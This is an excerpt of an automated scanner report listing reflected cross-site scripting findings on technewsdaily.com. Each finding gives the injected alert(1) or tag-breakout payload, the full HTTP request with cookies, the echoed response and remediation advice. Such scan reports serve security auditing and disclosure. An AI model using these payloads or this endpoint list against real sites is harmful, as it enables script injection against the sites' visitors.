<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/?f1fb4'-alert(1)-'19a27fe47f0=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e7fa'-alert(1)-'8759c4c243b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends-of-2010-as-shown-by-25-million-tweets-17971e7fa'-alert(1)-'8759c4c243b/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40496
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ype="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-17971e7fa'-alert(1)-'8759c4c243b/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.198. http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13cf5'-alert(1)-'df2abc24616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends-of-2010-as-shown-by-25-million-tweets-1797/?13cf5'-alert(1)-'df2abc24616=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:52 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... e="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/?13cf5'-alert(1)-'df2abc24616=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.199. http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32491"><a>2ff2bbac124 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /trends-of-2010-as-shown-by-25-million-tweets-1797/?32491"><a>2ff2bbac124=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63090
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/?32491"><a>2ff2bbac124=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab3d1'-alert(1)-'eb49626117c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wave-of-spam-surrounds-new-harry-potter-movie-1450ab3d1'-alert(1)-'eb49626117c/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... pe="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450ab3d1'-alert(1)-'eb49626117c/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.201. http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53950"><a>7c673f395e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wave-of-spam-surrounds-new-harry-potter-movie-1450/?53950"><a>7c673f395e9=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:28 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63417
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/?53950"><a>7c673f395e9=1/" /> ...[SNIP]...
1.202. http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dd02'-alert(1)-'c8d16eb49db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wave-of-spam-surrounds-new-harry-potter-movie-1450/?2dd02'-alert(1)-'c8d16eb49db=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:42 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63055
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... ="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/?2dd02'-alert(1)-'c8d16eb49db=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b8b3'-alert(1)-'188f08f1588 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /what-is-an-rss-feed--08138b8b3'-alert(1)-'188f08f1588/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40448
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/what-is-an-rss-feed--08138b8b3'-alert(1)-'188f08f1588/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.204. http://www.technewsdaily.com/what-is-an-rss-feed--0813/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/what-is-an-rss-feed--0813/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5634f"><a>97ac2df990 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /what-is-an-rss-feed--0813/?5634f"><a>97ac2df990=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62922
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/what-is-an-rss-feed--0813/?5634f"><a>97ac2df990=1/" /> ...[SNIP]...
1.205. http://www.technewsdaily.com/what-is-an-rss-feed--0813/ [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/what-is-an-rss-feed--0813/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b25a'-alert(1)-'f4517bebcde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /what-is-an-rss-feed--0813/?5b25a'-alert(1)-'f4517bebcde=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:42 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62590
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/what-is-an-rss-feed--0813/?5b25a'-alert(1)-'f4517bebcde=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
Report generated by XSS.CX at Sat Dec 18 10:37:31 CST 2010.